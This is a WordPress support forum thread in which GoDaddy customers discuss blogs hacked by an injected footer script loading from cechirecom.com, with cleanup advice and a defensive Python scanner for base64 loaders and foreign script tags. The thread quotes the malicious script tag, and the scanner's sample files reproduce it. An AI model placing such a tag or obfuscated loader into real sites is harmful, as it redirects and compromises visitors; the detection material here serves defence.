• My WordPress blog, hosted on a shared Linux hosting account at GoDaddy, has been hacked. The hacker injected a malicious JavaScript redirect into the footer of each page:

    <script src="https://cechirecom.com/js.php"></script>

    I have temporarily restored an earlier install of my blog, which has got rid of the redirect, and I’ll probably do a clean install later.

    But what worries me is that I am careful about blog security. I always update to the latest WordPress install as soon as it comes out, I always check plugins and only use the bare minimum, I have very strong passwords…

    So…does anyone know if it could be GoDaddy servers that have the problem? Or do I need to go through every WordPress hardening tip out there just to avoid this kind of thing?

Viewing 14 replies - 16 through 29 (of 29 total)
  • if you respond to this post please don't redirect me to a link where i can get help. that's not cool

    just type the steps here in this forum

    1
    2
    3
    4
    5
    6

    ( i just want to say whoever is responsible for this hack or virus – you could do well with your skills and help improve people's lives and not make life frustrating for people. maybe you should look in the mirror and tell yourself you are a good person and do good things with your skills….. ) try it!

    this is the email i received – i took out the phone number because i have no clue if this is a fake or real.. and i don't want to guide someone into a further trap of hell!!

    We are sending you this message because you may not be using the current version of WordPress.

    Many outdated versions of WordPress have been affected by malware. For the security of your site, it is important that you install the latest version of WordPress as soon as possible.

    While it’s convenient, the quick upgrade feature in WordPress and in Hosting Connections does not remove old files. We recommend a more thorough backup and upgrade.

    Please follow these detailed instructions to upgrade your version of WordPress and protect your site.

    We appreciate your attention on this critical issue. We are here to help if you have difficulty with the update/upgrade installations. While this “exploitation” is not unique to WordPress or Chadle, it has impacted some of our shared hosting customers and we are making every effort to “spread the word about the fix.” Our goal is to help you keep your website safe and secure. If you have questions, please call us 24/7 at .

    Sincerely,

    Hosting Security Team

    @helpme11
    GoDaddy.com did send out a notification to customers affected by this issue. Although I know you would prefer not to be linked, I want to avoid flooding the forum. For a step-by-step guide to update WordPress, please visit https://fwd4.me/NGN

    Alicia

    can someone from wordpress please respond to how can i fix my dashboard so i can continue with my blog posting..

    my post dashboard and
    comment dashboard is messed up

    @Hulbert (& everyone else in the same boat)–

    that looks like the same infection, so if you haven’t done so already, restoring to a backup from before you were hit would still work. then make sure you’ve got the right permissions and everything else set up (for what it’s worth, though it doesn’t seem to be doing much in terms of prevention for some people).

    this post on sucuri.net has a script you can run that might make things a little easier (especially if you keep getting hit by the same thing): https://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html

    https://wpsecuritylock.com has been posting pretty regular updates on all the attacks with complete steps for recovering your site as well.

    NOTE: If you suspect your WordPress site has been affected by a security issue, we recommend upgrading your WordPress installation.

    i already had an upgraded version.

    so should i do it again? and upgrade.

    well i did. i upgraded

    and i still have a messed up dashboard.

    what can i do? please

    i just had a thought. why would someone want to hack our websites. so pointless. what do they gain from it?

    i'm still waiting for a reply. i wish i was getting a notification every time there is a reply so i don't have to keep refreshing the page to see if someone replied.

    omg

    Upgrading after you have been hacked does nothing. It’s putting a band-aid on a gangrenous leg.

    Sanitize your site and your database first.

    Second, close the holes that have nothing to do with wordpress, such as:
    1) Crappy passwords and sloppy habits
    2) Incorrect file permissions and ownership
    3) Infected and neglected PCs on your home network used to upload files to your web space
    4) Neglecting or ignoring security updates and a lack of regard for learning the basics about caring for a web space
    5) Stop storing FTP and other login credentials in every desktop application that will store them.

    why would someone want to hack our websites. so pointless. what do they gain from it?

    Not pointless at all. “They” want to control your web space for their own use because it’s weak and exploitable for some reason. “They” don’t care who you are, and “They” are usually robots and scripts. The human factor is a very distant endpoint in most cases.

    You can start by following and reading the information in the links you find listed here:

    https://www.ads-software.com/support/topic/396449?replies=8#post-1506407

    You can also post a link to one of your hacked sites, and someone (if they dare visit your site) might be able to provide you more info on the “how”, or “why” aspect of the problem.

    This is what my friend wrote to me:

    look at wp-content/themes/sem-reloaded/ (anything with that datestamp
    me: where do i go to see that ..
    friend: You’ll see base 64 code at the top of each script. It’s all been hacked.
    ftp
    It’s not part of WP.
    use an FTP client to get to your server
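
Added example, not part of any post in this thread: a read-only Python scan for the two symptoms described above, the external `<script src=…>` tag in the footer and the base64 code at the top of PHP files. The regular expressions, the 4 KB "top of file" window, the `sample-theme` directory and the `blog.example` allowlist host are assumptions chosen for illustration; the sample files are constructed.

```python
import os
import re
import tempfile
from urllib.parse import urlparse

# Obfuscated loader near the top of a PHP file: eval( [gzinflate(] base64_decode( ...
EVAL_B64 = re.compile(rb"eval\s*\(\s*(?:gzinflate\s*\(\s*)?base64_decode\s*\(", re.I)
# Any <script src=...> tag; accepts straight or curly quotes around the URL.
SCRIPT_SRC = re.compile(r"<script[^>]+src\s*=\s*[\"'\u201c\u201d]?([^\"'\u201c\u201d\s>]+)", re.I)
HEAD_BYTES = 4096  # assumption: "top of each script" means the first few KB


def scan_tree(root, allowed_hosts):
    """Return sorted (relative_path, reason) findings for files under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".html", ".htm", ".js")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                data = fh.read()
            rel = os.path.relpath(path, root)
            if name.lower().endswith(".php") and EVAL_B64.search(data[:HEAD_BYTES]):
                findings.append((rel, "eval(base64_decode) at top of file"))
            for src in SCRIPT_SRC.findall(data.decode("utf-8", "replace")):
                host = urlparse(src).hostname  # None for relative URLs
                if host and host not in allowed_hosts:
                    findings.append((rel, "external script from " + host))
    return sorted(findings)


def demo():
    """Build a small constructed theme directory and scan it."""
    with tempfile.TemporaryDirectory() as root:
        theme = os.path.join(root, "wp-content", "themes", "sample-theme")
        os.makedirs(theme)
        samples = {  # constructed files; the base64 payload decodes to "echo 1;"
            "index.php": '<?php eval(base64_decode("ZWNobyAxOw==")); ?>\n<?php get_header(); ?>\n',
            "footer.php": '<script src="https://cechirecom.com/js.php"></script>\n</body>\n',
            "header.php": '<script src="https://blog.example/wp-includes/js/jquery.js"></script>\n',
        }
        for name, body in samples.items():
            with open(os.path.join(theme, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_tree(root, allowed_hosts={"blog.example"})  # assumed own host


if __name__ == "__main__":
    for rel, reason in demo():
        print(rel, "->", reason)
```

A clean result does not prove the site is clean: the scan covers only these two patterns in files on disk and does not look at the database.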

    Go here, read this, try the fix. Help others by reporting back with the results.

    https://www.ads-software.com/support/topic/396524/page/2?replies=47#post-1506618

    Hmm. Your web host is responsible only up to a certain degree for providing security for your website and then the actual owner is responsible for his or her own personal website security. I see someone mentioned checking file and folder permissions to make sure they are set correctly. And I see someone else mentioned protecting and securing documents that contain passwords and account info. I also see several other very good procedures and practices that everyone should follow to ensure their own personal website security.

    This is going to seem like self promotion and I guess it is a little bit, but believe it or not I actually really genuinely care and like offering help whenever possible. So anyway I had a client that was hacked on GD a couple of months ago because they had custom coding (it was dirty code) that was being exploited by an XSS script attack. The client had an HTML site and a WordPress website that was being hacked.

    I came across some .htaccess code that filters and blocks XSS and SQL injection hacking attacks. I then went on to make a simple WordPress plugin to automate handling the .htaccess files, simple and easy, and added a maintenance mode for my own personal use as a website developer. WordPress is very secure already, but if you leave any doors open, trust me a hacker will be camping in your website living room before you have a chance to blink.

    I’m going to say it again WordPress is already very secure, but if you want an extra level of protection against XSS or SQL injection hacks then check out the BulletProof Security plugin. It’s very simple and very effective. I have tested it in the most hacker infested waters with open website wounds clearly exposed for hackers to see and so far so good. Zero XSS or SQL injection hacked websites that are now using BulletProof Security. Yeah I’m plugging my own plugin LOL. I’m offering some help so take it or leave it. There is nothing that sucks more than having to clean up a website that has been hacked. Ugh.

    Whether or not you use the plugin, one thing that should be standard for any website is an .htaccess file that actually provides security for your website.

    My blog has been infected 4 times in as many weeks. I run a php script to clean every file on my end and then reinstall wordpress, my theme and all plugins. I change my WordPress key, passwords, FTP password, MySQL password. And it still keeps coming back! And yes, I have GoDaddy! Those people lost a customer.

  • The topic ‘Godaddy wordpress blog hacked’ is closed to new replies.